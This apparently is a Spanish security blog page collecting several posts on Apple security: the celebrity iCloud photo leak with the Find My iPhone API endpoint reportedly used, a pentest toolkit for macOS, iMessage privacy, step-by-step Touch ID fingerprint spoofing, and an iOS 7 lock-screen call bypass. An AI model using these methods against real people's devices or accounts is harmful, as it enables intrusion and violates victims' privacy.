Llevo gran parte de la mañana pensando en como abordar el tema dela obtención de fotos intimas de famosas, del hackeo de icloud y de la difusión de estas fotos por 4chan. Así que, yo os lo suelto todo. 


Bueno, presuntamente, no fue un bug de icloud si un fallo en la llamada RESET de la API "FindMyMobile" de Apple. En la cual podrías preparar un ataque con el siguiente enlace: 
  • "https://fmipmobile.icloud.com/fmipservice/device/'+apple_id+'/initClient"
Si os habéis fijado, se requiere el Apple ID de la victima y puesto que se trata de personas famosas, esa información no debe ser de dominio público. 

Mas información y el Script que presuntamente utilizo atacante lo tenéis en UnAlDia de Hipasec: 
¿Y si soy un campechano, pero si que hay gente que conoce mi AppleID que hago?: 
¿Que pasa con los metadatos?

También he visto que hay mucho revuelo con el tema de los metadatos y nadie ha hablado aun de ello. La verdad es que no hay mucho que contar,  algunas actrices si limpiaban las fotos de metadatos,  otras se las hicieron sin el GPS activado y solo se puede ver la información del formato Exif (Exchangeable image file format) y que dejaron el GPS activado en bastantes de ellas. 

Vamos, que alguien podría hacer un mapa con ellas. 

Sed Buenos con esto y revisad bien vuestras contraseñas de icloud  0;) 

miércoles, 4 de junio de 2014

Swift.- El Nuevo Lenguaje De Programación De Apple

Ayer Apple nos puso al día de sus novedades. La verdad es que no me parecieron grandes novedades, pero no me voy a centrar en eso.  Me centraré en el nuevo lenguaje de programación que Apple utilizará para IOS y Mac OS X. Al cual, ya le estaría dando caña si tuviera un Mac OS X.


"Swift es el resultado de las últimas investigaciones sobre los lenguajes de programación, combinada con décadas de experiencia en la construcción de plataformas de Apple. Los parámetros con nombre que hubiera pendientes de Objective-C se expresan en una sintaxis limpia que hace que las API en Swift aún más fácil de leer y mantener. Tipos inferidos hacen código más limpio y menos propenso a errores, mientras que los módulos eliminar encabezados y proporcionan espacios de nombres. La memoria se realiza de forma automática, y usted ni siquiera necesita para escribir un punto y coma."
Como sabréis no tener el equipo necesario no es escusa para no buscarse la vida. Así que entre practica y practica de PowerShell me he dedica do a curiosear toda la documentación oficial. Está claro que con mis conocimientos no puedo entenderla en su plenitud pero seguro que vosotros si. Así que os dejo los enlaces a la documentación  aquí abajo.

Documentación: 
Fuente: 

K0SASP.- Hacking En Mac OS X

Muy poco sabréis mi firme intención de pasarme una larga temporada usando Linux después de los exámenes pero lo que aún sabréis menos es mi objetivo de comprarme un Mac OS X para aprender y convivir con otro sistema y valorar los pros y los contras por mi mismo. 


Viendo un poco hacia el futuro y después de varias pasadas por blogs o paginas de otros apasionados con la seguridad informática me he topado con K0SASP (Kontrol0-Security Auditor Software Pack) un paquete de instalación que nos proveerá el software necesario para nuestras auditorias de seguridad ademas de ser funcional en MacOS X y tener un menú muy bonito. 



¿Qué Software tendremos si usamos K0SASP?

Information Gathering
  • TheHarvester
  • Nmap
  • Zenmap
  • Maltego
  • Knock-scan
  • Keepnote
  • Dnsmap
  • DMitry
Exploitation
  • Network
    • Metasploit
    • Setoolkit
  • Web Exploitation
  • Burp Suite
  • DirBuster
  • Sqlmap
  • ncat
  • Fimap
  • weevely
  • Slowhttptest
  • Wapiti 
  • Webscarab
  • wfuzz 
Sniffing
  • TCPDump
  • Wireshark
  • Sslstrip
Anonymity
  • Tor+TorBrowser
Password Cracking
  • Hydra
  • John The Ripper
Connections
  • Cyberducks
  • DBeaver
Forensic Analysis
  • Binary Cookie Reader
  • iExplorer
  • SQLite Database Brownser
Vulnerability Analysis
  • Owasp ZAP
  • Vega
  • Nikto
  • GoLISMERO
  • Joomscan

Software requerido
  • PyGTK
  • XQuartz
  • Command Line Tools

La verdad es que K0SASP va a ser una de las primeras piezas de Software que tenga mi equipo con Mac OS X es sencillo, practico y con las herramientas necesarias para trabajar. Sencillamente, me encanta. 

Mas información y fuente de la herramienta: 
No dejéis de echarle un ojo a su libro sobre BackBox3 que merece muchísimo la pena.

Sed Buenos con esto ;) 


domingo, 20 de octubre de 2013

Slide.- iMessage y Su Privacidad.

En pleno apogeo sobre todo lo relacionado con la NSA, la dudosa privacidad que nos aportan los productos Apple y el lanzamiento de iMessage me hizo querer buscar mas información sobre como funcionaba iMessage para en un futuro poder confiar en el o no. Así que me encontré de cara con la siguiente Slide donde no solo dan una gran clase sobre como funciona si no que ademas, nos reseñan que tipos de ataques se podrían realizar. 


Ya sabéis que no suelo poner cualquier Presentación como articulo del blog si no me pareciera que merece mucho la pena y que nos puede enseñar mucho. Así que espero que aprendáis y disfrutéis por que realmente vale mucho la pena. 
Sed Buenos con esto ;)

lunes, 23 de septiembre de 2013

Huellas Falsas y El Lector Biométrico de Iphone 5s by Hector (h3ku) Cuesta

Apenas ha pasado una semana desde que salió al mercado IOS7, y por el momento el asunto está a una vulnerabilidad por día ([Podéis verlas en las anteriores entradas de statex]), en esta ocasión es más concretamente del nuevo IPhone 5s y de su principal novedad el lector biométrico. Los chichos del Chaos Computer Club se han saltado el lector con el método más antiguo, creando una huella falsa, podéis ver aquí el video.


En primer lugar han sacado una foto de la huella de la víctima (Concretamente de una botella) a una resolución de 2400dpi, lo recomendable para que la huella sea más visible es aplicarla un poco de [cianocrilato] pero hay técnicas más caseras como un poco de carboncillo o polvos de talco, han pasado la imagen a ordenador, le han limpiado las imperfecciones, han invertido la imagen para crear un negativo y la han impreso con una impresora láser de 1200dpi en papel transparente con un toner grueso, podéis verlo en esta imagen.


Para terminar han aplicado un poco de latex a la impresión y listo, ya tienen su huella falsa.

Hay más métodos que tengo en mente pero no tengo el placer de probar, como por ejemplo usar de sustituto del látex un osito de gominola (Funcional en gran cantidad de sistemas biométricos), o como molde si no tienes acceso a una impresora similar una tarjeta de circuito impreso foto-sensible (PCB)

Fuente: http://dasalte.ccc.de/biometrie/fingerabdruck_kopieren?language=en

Esta entrada ha sido realizada por [Hector (h3ku) Cuesta] ya que hablando por ciertos circulos fue el primero en aportar toda esta información (y sobre todo en hacer la broma de que ya tenia entrada para hoy xD ) Así que, le ofrecí que hiciera la entrada de hoy. 

domingo, 22 de septiembre de 2013

Nuevo Bug En IOS 7.- Llamar Sin Desbloquear El Teléfono

Ayer ya hablamos sobre una vulnerabilidad que nos permitía saltarnos/bypasear la pantalla de desbloqueo del nuevo sistema operativo para Iphone/Ipad de Apple. Pues, hoy se ha descubierto otro bug el cual esta vez nos permite hacer llamadas al teléfono que nosotros elijamos sin necesidad de desbloquear la pantalla. Esto es muy útil para cuando nuestros amigos nos dejen sus flamantes Iphone ultimo modelo. el truco es tan sencillo que se puede resumir en la siguiente fotografía.


Toda la información sobre este bug la podréis encontrar en el siguiente enlace pero ya os digo que no es nada que no se pudiera haber corregido con el testeo adecuado: 
Estos bug han salido creo yo en el mejor momento, ahora que mucha gente está pensando en comprar uno Iphone 5S con el nuevo IOS7 donde ya se demostró, en el articulo de ayer, que lo del detector de huellas dactilares no es nada mas que una pijada. Apple ya puede buscar una solución para este problema ya sea a través de buscar un parche o haciendo una campaña de publicidad mas agresiva (aunque esto ultimo ya lo estén haciendo otras personas xD)


Sed Buenos con esto también ;)